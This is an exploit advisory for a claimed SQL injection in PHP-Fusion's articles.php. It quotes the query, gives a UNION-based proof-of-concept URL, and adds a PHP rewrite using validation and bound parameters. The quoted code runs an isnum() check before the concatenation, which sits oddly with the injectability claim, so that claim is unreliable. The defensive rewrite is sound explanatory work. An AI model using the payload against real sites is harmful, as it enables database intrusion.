PHP-Fusion is a content management system. Its articles.php script has an SQL injection vulnerability, which may lead to leakage of sensitive information.
[+] Info:
~~~~~~~~~
# Title: PHP-Fusion (articles.php) SQL Injection Exploit
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Remote SQL Injection
# Tested on: Windows XP sp3 FR
[+] Poc:
~~~~~~~~~
# Vulnerability in the file articles.php:
if (isset($_GET['article_id']) && isnum($_GET['article_id'])) {
    // article_id from the query string is concatenated into the SQL text
    $result = dbquery(
        "SELECT ta.article_subject, ta.article_article, ta.article_breaks,
        ta.article_datestamp, ta.article_reads, ta.article_allow_comments, ta.article_allow_ratings,
        tac.article_cat_id, tac.article_cat_name,
        tu.user_id, tu.user_name, tu.user_status
        FROM ".DB_ARTICLES." ta
        INNER JOIN ".DB_ARTICLE_CATS." tac ON ta.article_cat = tac.article_cat_id
        LEFT JOIN ".DB_USERS." tu ON ta.article_name = tu.user_id
        WHERE ".groupaccess('article_cat_access')." AND article_id = ".$_GET['article_id']." AND article_draft = 0"
    );
# Exploit: http://[localhost]/[Path]/articles.php?article_id=-1+union+select+version()--
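
A hardened form of the article lookup, as an added example that is not PHP-Fusion's own code: the id is validated against a digits-only allow-list and then passed as a bound parameter instead of being concatenated into the query. The function name fetch_article, the simplified articles table, and the in-memory SQLite database standing in for the CMS database layer are assumptions made for illustration.

```php
<?php
// Added example: hardened article lookup. Column names follow the excerpt
// above; the in-memory SQLite database and its rows are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE articles (
    article_id INTEGER PRIMARY KEY, article_subject TEXT, article_draft INTEGER)");
$db->exec("INSERT INTO articles VALUES (1, 'Welcome', 0), (2, 'Unpublished', 1)");

/**
 * Hypothetical helper: returns the published article row, or null when the
 * id is malformed or no matching article exists.
 */
function fetch_article(PDO $db, $rawId): ?array
{
    // 1. Allow-list validation: a string of digits only, bounded length.
    //    Request parameters can also arrive as arrays (article_id[]=1).
    if (!is_string($rawId) || !ctype_digit($rawId) || strlen($rawId) > 10) {
        return null;
    }
    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare(
        "SELECT article_id, article_subject FROM articles
         WHERE article_id = :id AND article_draft = 0"
    );
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, a draft id, the decoded query-string value
// from the advisory, and an array-typed parameter.
$inputs = ['1', '2', '-1 union select version()--', ['1']];
foreach ($inputs as $in) {
    $row = fetch_article($db, $in);
    printf("%-34s => %s\n", json_encode($in),
        $row ? $row['article_subject'] : 'rejected / not found');
}
```

Only the first input returns a row; the draft, the advisory's value, and the array are all answered with null, so the caller can return a uniform "not found" response.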